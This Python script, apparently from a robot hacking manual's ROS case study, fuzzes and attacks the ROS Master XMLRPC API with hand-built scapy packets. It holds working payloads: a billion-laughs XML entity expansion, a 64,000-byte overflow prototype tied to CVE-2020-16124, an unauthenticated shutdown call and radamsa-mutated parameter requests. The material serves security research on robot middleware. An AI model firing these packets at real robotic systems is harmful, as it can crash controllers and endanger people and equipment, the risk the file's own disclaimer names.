1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 18
|
2021-11-15T09:55:48.000Z
|
2022-03-08T10:25:58.000Z
|
"""
Fuzz testing ROS networking
DISCLAIMER: Use against your own hosts only! By no means I encourage or promote the unauthorized tampering
with running robotic systems. This can cause serious human harm and material
damages.
"""
from fuzzingbook.Fuzzer import RandomFuzzer
import sys
import random
from datetime import datetime
from subprocess import Popen, PIPE
from scapy.all import *
from scapy.layers.inet import TCP, IP
from scapy.layers.http import HTTP, HTTPRequest, HTTPResponse
from scapy.layers.http_client import HTTPClient
from scapy.layers.l2 import Ether
from scapy.contrib.tcpros import *
# bind layers so that packages are recognized as TCPROS
bind_layers(TCP, TCPROS)
bind_layers(HTTPRequest, XMLRPC)
bind_layers(HTTPResponse, XMLRPC)
# bind_layers(HTTPROSRequest, XMLRPC)
# bind_layers(HTTPROSResponse, XMLRPC)
"""
Short summary of how this was developed:
1. The corresponding command was shipped while scapy was monitoring the network:
packages = sniff(iface="eth0", filter="tcp")
2. Packages captured correspond with:
>>> packages.show()
0000 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 S
0001 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 SA
0002 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
0003 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 PA / TCPROS / Raw
0004 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 A
0005 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 PA / TCPROS / Raw
0006 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
0007 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 FA
0008 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 FA
0009 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
Note that binding the TCPROS layer to TCP results into the dissector kicking in
and interpreting the packages accordingly.
3. Reproducing the interaction by generating ".command()" for each one of the
relevant packages:
>>> packages[0].command()
"Ether(dst='02:42:0c:00:00:02', src='02:42:0c:00:00:04', type=2048)/IP(version=4, ihl=5, tos=0, len=60, id=24918, fla
gs=2, frag=0, ttl=64, proto=6, chksum=49504, src='12.0.0.4', dst='12.0.0.2')/TCP(sport=48098, dport=11311, seq=318660
7024, ack=0, dataofs=10, reserved=0, flags=2, window=65048, chksum=6196, urgptr=0, options=[('MSS', 1384), ('SAckOK',
b''), ('Timestamp', (1859734885, 0)), ('NOP', None), ('WScale', 7)])"
From this we produced a valid/reduced version that can be used in a script:
p_attack = IP(version=4, frag=0, ttl=64,
proto=6, dst='12.0.0.2')/TCP(sport=48099,
dport=11311, seq=0, ack=0, flags=2)
We continue doing something similar with the rest of the packages.
"""
###################################################################################
# VARIABLES
###################################################################################
radamsa_bin = "/usr/bin/radamsa"
FUZZ_FACTOR = 20.0
source = "14.0.0.4" # for some reason, I'm unable to get a different source
# or even its own.
random.seed(datetime.now())
# default package to execute "rosparam get /rosdistro"
package_rosparam_get_rosdistro = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_rosparam_get_rosdistro_long = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam----18446744073709551616</string></value>\n</param><param>\n</param><param><param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param></param><param></param><param></param>\n<param></param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# default package to execute "getPid" method of Master API
package_getPid = (
IP(version=4, ihl=5, tos=0, flags=2, frag=0, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"159",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getPid",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rostopic</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_shutdown = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20001,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"shutdown",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>4L145_R080T1C5</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_rosparam_get_missing_callerid = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# TODO: proper process of this sort of packages
# requires TCP segment reassembly
# refer to https://gist.github.com/MarkBaggett/d8933453f431c111169158ce7f4e2222
package_rosparam_set_weird = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"setParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>//rrrr\xca\xb3osdirrrosdttrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrrrrrrro/srrrrrosdirrrosdittrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrr\xe2\x80\x8arrrrrrrro/srrrrrosdirrrosri/drtotrrosdjttrrrrrrsrrrrro/rrrosejttro</string></value>\n</param>\n<param>\n<value><string>m----3eeelme\xf0\x9f\x92\xa9lodic</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# Billion Laugh Attack
# XMML External Entity attack, valid in indigo and before
package_xxe = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.0",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?><!DOCTYPE string [<!ENTITY a0 'dos' ><!ENTITY a1 '&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;'><!ENTITY a2 '&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;'><!ENTITY a3 '&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;'><!ENTITY a4 '&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;'><!ENTITY a5 '&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;'><!ENTITY a6 '&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;'><!ENTITY a7 '&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;'><!ENTITY a8 '&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;'> ]>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-924sdasds18</string></value>\n</param>\n<param>\n<value><string>/rosdistro &a8; </string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# Prototypes CVE-2020-16124 / Integer overflow in ros_comm
package_integer_overflow = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>"
+ b"/rosdistro"
+ b"a" * 64000
+ b"</string></value>\n</param>",
# + b"</nextag></tag>\n", # maxint 2147483647
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
###################################################################################
# GENERAL FUNCTIONS
###################################################################################
def yellow(text):
print("\033[33m", text, "\033[0m", sep="")
def red(text):
print("\033[31m", text, "\033[0m", sep="")
def gray(text):
print("\033[90m", text, "\033[0m", sep="")
def magenta(text):
print("\033[35m", text, "\033[0m", sep="")
def mutate(payload):
"""
Mutates data using radamsa binary.
NOTE: FLAGS are hardcoded
param: payload, binary (string b"") data to mutate
returns: binary mutated data (string b"")
"""
# try:
radamsa = [radamsa_bin, "-n", "1", "-"]
p = Popen(radamsa, stdin=PIPE, stdout=PIPE)
mutated_data = p.communicate(payload)[0]
# except:
# print("Could not execute 'radamsa'.")
# sys.exit(1)
return mutated_data
def retry_and_report(package, iteration, timeout=2):
"""
Retry sending a package and report if fails
"""
ans = sr(package, timeout=timeout)
gray(package)
try:
answered_package = ans[0][0] # includes package sent, and answers
# print(type(a))
for p in list(answered_package):
print(p.summary())
yellow(p[HTTP])
except IndexError as e:
red("No answer received on iteration: " + str(iteration))
retry_and_report(package, iteration + 1)
def log_events(log_info, type_event):
"""
Log events for post-analysis
param log_info, scapy package
param type_event: str, either "fuzzing", "weird" or "error"
"""
log_msg = (
"["
+ time.ctime()
+ "]"
+ "\n\n"
+ log_info.command()
+ "\n\n"
+ raw(log_info).decode("iso-8859-1")
)
# log_msg_encoded = log_info
if type_event == "fuzzing":
try:
fd = open("fuzz.log", "a")
except IOError as err:
return "[!] Error opening log file: %s" % str(err)
elif type_event == "error":
try:
fd = open("error.log", "a")
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
elif type_event == "weird":
try:
fd = open("weird.log", "a")
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
else:
return "[!] '%s' is an unrecognized log event type." % type_event
if fd:
fd.write(log_msg)
return
def preamble():
"""
ROS XMLRPC preamble
returns: bool, indicating if successful
"""
# send the SYN, receive response
p_attack = IP(version=4, frag=0, ttl=64, proto=6, dst="12.0.0.2") / TCP(
sport=origin_port, dport=11311, seq=0, ack=0, flags=2
)
ans = sr1(p_attack, retry=0, timeout=1)
# ans = srp1(p_attack, retry=0, timeout=1)
if ans and len(ans) > 0 and ans[TCP].flags == "SA":
# print(ans.summary()) # debug
# ls(ans) # debug
# send the ACK
p_attack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=ans[TCP].ack,
ack=ans[TCP].seq + 1,
)
send(p_attack)
return True, ans
else:
return False, ans
def process_xmlrpc_response(p_attack, ans, unans, field_name=None):
"""
Abstracts how the different functions process the XMLRPC responses
for logging and analysis purposes.
param p_attack: package used during the attack
param ans: first result from scapy sr
param uans: second result from scapy sr
param field_name: field_name to consider when logging/evaluating
Essentially:
1. makes sure that there's an answer
2. fetches the field to evaluate (or None)
3. Checks results and responses and logs accordingly
"""
# check if there's been an answer at all
if len(ans) > 0:
# ans.show() # debug
# print(list(ans[0][1])[0][XMLRPC]) # debug
# print(ans[0][1][1][XMLRPC]) # debug
response = list(ans[0][1])[0]
if response == None:
red("response None")
# give it some colour for visual debugging:
# print(response[XMLRPC])
# print(response) # debug
# print(type(response)) # debug
# print(b"Error" in response) # debug
# print(b"Error" in raw(response)) # debug
field_evaluated = getattr(p_attack, field_name)
if (
b"Error" in raw(response)
or b"is not set" in raw(response)
or b"Exception" in raw(response)
or b"missing required caller_id" in raw(response)
):
red(response[XMLRPC])
if not field_evaluated in errors_list:
log_events(p_attack[XMLRPC], "error")
errors_list.append(field_evaluated)
# params, /rosdistro
elif (
b"melodic" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and field_name == "params"
):
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
# params, setParam
elif (
b"parameter" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and b"set" in raw(response)
# and b"<int>0</int>" in raw(response)
and field_name == "params"
):
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
# getPid
elif b"<int>1</int>" in raw(response) and field_name == "methodname":
yellow(response[XMLRPC])
if not field_evaluated in valid_list:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list.append(field_evaluated)
else:
# something weird happened, review
magenta(response[XMLRPC])
if not field_evaluated in weird_list:
log_events(p_attack[XMLRPC], "weird")
weird_list.append(field_evaluated)
#################
# send the ACK so that we don't get spammed for retransmissions
#################
ack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=response[TCP].ack,
ack=len(response[TCP].payload) + response[TCP].seq,
)
send(ack)
###################################################################################
# ATTACKS
###################################################################################
def rosparam_get_rosdistro():
"""
An auxiliary function to send a "rosparam get /rosdistro"
Sending the following params:
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
# p_attack = package_rosparam_get_missing_callerid
# p_attack = package_rosparam_get_rosdistro_long
# p_attack = package_xxe
# default package to execute "rosparam get /rosdistro"
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# adjust size of XMLRPC package payload
print(len(p_attack[HTTPRequest].payload))
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
gray(p_attack[XMLRPC]) # debug sent package
# # send and receive potentially huge packages
# fragments = fragment(p_attack, 800)
# print(len(fragments))
# for f in fragments:
# send(f)
#
# ans = sniff(iface="eth0", filter="tcp", timeout=2)
# print(ans.show())
# # print(ans[0])
# # print(ans[1])
ans, unans = sr(p_attack, timeout=0.5)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def getpid():
"""
An auxiliary function to send a "rosparam get /rosdistro"
request that includes fuzzed fields.
"""
success, ans = preamble()
if success:
p_attack = package_getPid
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
ans, unans = sr(p_attack)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "methodname")
def rosparam_set_param():
"""
An auxiliary function to send a "rosparam set /rosdistro whatever"
"""
success, ans = preamble()
if success:
# Using default packages
# p_attack = package_rosparam_get_rosdistro
p_attack = package_rosparam_set_weird
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
p_attack[XMLRPCCall].methodname = b"setParam"
# # force setting it
# params = "<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n<param>\n<value><string>whatever</string></value>\n</param>\n"
# params = params.encode("iso-8859-1")
# p_attack[XMLRPCCall].params = params
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def shutdown():
"""
Call the shutdown method from the external API defined as:
Stop this server
@param caller_id: ROS caller id
@type caller_id: str
@param msg: a message describing why the node is being shutdown.
@type msg: str
@return: [code, msg, 0]
@rtype: [int, str, int]
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_shutdown
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# gray(p_attack[XMLRPC].params) # debug package to send
ans, unans = sr(p_attack, timeout=5)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, field_to_fuzz)
def rosparam_get_fuzzing(field_name="params"):
"""
An auxiliary function to send a "rosparam get ..." while fuzzing
Sending the following default params:
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# fuzzing
field = random.choice(valid_list) # randomly pick from the list of valid ones
field_mutated = None
while not field_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_mutated = mutate(field)
# set fuzzed value into the attack
setattr(p_attack, field_name, field_mutated)
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
gray(p_attack[XMLRPC].params) # debug package to send
ans, unans = sr(p_attack, timeout=2)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, field_name)
def fuzz_XMLRPC():
"""
Fuzz a whole XMLPRC package
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = copy.deepcopy(package_rosparam_get_rosdistro)
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
# fuzzing
field = random.choice(valid_list) # randomly pick from the list of valid ones
field_mutated = None
while not field_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_mutated = mutate(field)
# set fuzzed value into the attack
p_attack[XMLRPCCall] = XMLRPCCall(field_mutated)
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
gray(p_attack[XMLRPC])
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
process_xmlrpc_response(p_attack, ans, unans, "params")
def rosparam_set_param_fuzzing():
"""
An auxiliary function to send a "rosparam set /something whatever"
"""
success, ans = preamble()
if success:
# Using default packages
p_attack = package_rosparam_get_rosdistro
p_attack[TCP].sport = origin_port
p_attack[TCP].seq = ans[TCP].ack
p_attack[TCP].ack = ans[TCP].seq + 1
p_attack[XMLRPCCall].methodname = b"setParam"
# fuzzing
## field_name
field_name = random.choice(
valid_list_name
) # randomly pick from the list of valid ones
field_name_mutated = None
while not field_name_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_name_mutated = mutate(field_name)
## field_value
field_value = random.choice(
valid_list_value
) # randomly pick from the list of valid ones
field_value_mutated = None
while not field_value_mutated:
if random.random() < FUZZ_FACTOR / 100:
field_value_mutated = mutate(field_value)
params_raw = (
b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/"
+ field_name_mutated
+ b"</string></value>\n</param>\n<param>\n<value><string>"
+ field_value_mutated
+ b"</string></value>\n</param>\n"
)
# params = params_raw.encode("iso-8859-1")
params = params_raw
# set fuzzed value into the attack
# setattr(p_attack, "params", params) # another way of doing it
p_attack[XMLRPCCall].params = params
# adjust size of XMLRPC package payload
p_attack[HTTPRequest].Content_Length = str(
len(p_attack[HTTPRequest].payload)
).encode("iso-8859-1")
# debug output
ans, unans = sr(p_attack, timeout=3)
# process the response coherently and return ACK
# check if there's been an answer at all
if len(ans) > 0:
# ans.show() # debug
# print(list(ans[0][1])[0][XMLRPC]) # debug
# print(ans[0][1][1][XMLRPC]) # debug
response = list(ans[0][1])[0]
if response == None:
red("response None")
# give it some colour for visual debugging:
# print(response[XMLRPC])
# print(response) # debug
# print(type(response)) # debug
# print(b"Error" in response) # debug
# print(b"Error" in raw(response)) # debug
# in this case, we add to errors and weird the complete
# params whereas to the valid, we seaprate in the two lists
# for further combination exploration
field_evaluated = params_raw
if (
b"Error" in raw(response)
or b"is not set" in raw(response)
or b"Exception" in raw(response)
):
red(response[XMLRPC])
if not field_evaluated in errors_list:
log_events(p_attack[XMLRPC], "error")
errors_list.append(field_evaluated)
# params, setParam
elif (
b"parameter" in raw(response) # hardcoded for testing setup
and b"<int>1</int>" in raw(response)
and b"set" in raw(response)
and b"<int>0</int>" in raw(response)
):
yellow(response[XMLRPC])
# name
if not field_name_mutated in valid_list_name:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list_name.append(field_name_mutated)
# value
if not field_value_mutated in valid_list_value:
log_events(p_attack[XMLRPC], "fuzzing")
valid_list_value.append(field_value_mutated)
else:
# something weird happened, review
magenta(response[XMLRPC])
if not field_evaluated in weird_list:
log_events(p_attack[XMLRPC], "weird")
weird_list.append(field_evaluated)
#################
# send the ACK so that we don't get spammed for retransmissions
#################
ack = IP(
version=4, ihl=5, flags=2, frag=0, ttl=64, proto=6, dst="12.0.0.2"
) / TCP(
sport=origin_port,
dport=11311,
flags=16,
seq=response[TCP].ack,
ack=len(response[TCP].payload) + response[TCP].seq,
)
send(ack)
###################################################################################
# CORE LOGIC
###################################################################################
# # ##############################
# # # fuzzing getParam
# # ##############################
# field_to_fuzz = "params" # "methodname", "params"
# weird_list = [] # list containing weird/non-accounted responses
# errors_list = [] # a list containing each
# # of the target fields of the fuzzing that leads to errors
#
# # a list containing each of the target fields of the fuzzing
# # that leads to valid reponses, starts with one valid so that it can iterate
# valid_list = [
# getattr(package_rosparam_get_rosdistro, field_to_fuzz),
# # b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
# # b"getParam"
# # raw(package_rosparam_get_rosdistro[XMLRPCCall])
# ]
#
# while True:
# origin_port = random.randint(1000, 65000)
# rosparam_get_fuzzing(field_to_fuzz)
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid candidates: " + str(len(valid_list)))
# magenta("Weird candidates: " + str(len(weird_list)))
# ##############################
# # fuzzing setParam
# ##############################
# weird_list = [] # list containing weird/non-accounted responses
# errors_list = [] # a list containing each
#
# valid_list_name = [b"/rosdistro"]
# valid_list_value = [b"indigo"]
#
# while True:
# origin_port = random.randint(1000, 65000)
# rosparam_set_param_fuzzing()
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid name candidates: " + str(len(valid_list_name)))
# yellow("Valid value candidates: " + str(len(valid_list_value)))
# magenta("Weird candidates: " + str(len(weird_list)))
# ##############################
# # fuzzing whole XMLRPCCall
# ##############################
# weird_list = []
# errors_list = []
# valid_list = [
# raw(package_rosparam_get_rosdistro[XMLRPCCall]),
# raw(package_getPid[XMLRPCCall]),
# # raw(package_shutdown[XMLRPCCall]),
# ]
#
# while True:
# origin_port = random.randint(1000, 65000)
# fuzz_XMLRPC()
# red("Error candidates: " + str(len(errors_list)))
# yellow("Valid candidates: " + str(len(valid_list)))
# magenta("Weird candidates: " + str(len(weird_list)))
#############################
# individual attacks testing (no real fuzzing in here)
#############################
origin_port = random.randint(1000, 65000)
field_to_fuzz = "params" # "methodname", "params"
weird_list = [] # list containing weird/non-accounted responses
errors_list = [] # a list containing each
valid_list = []
# while True:
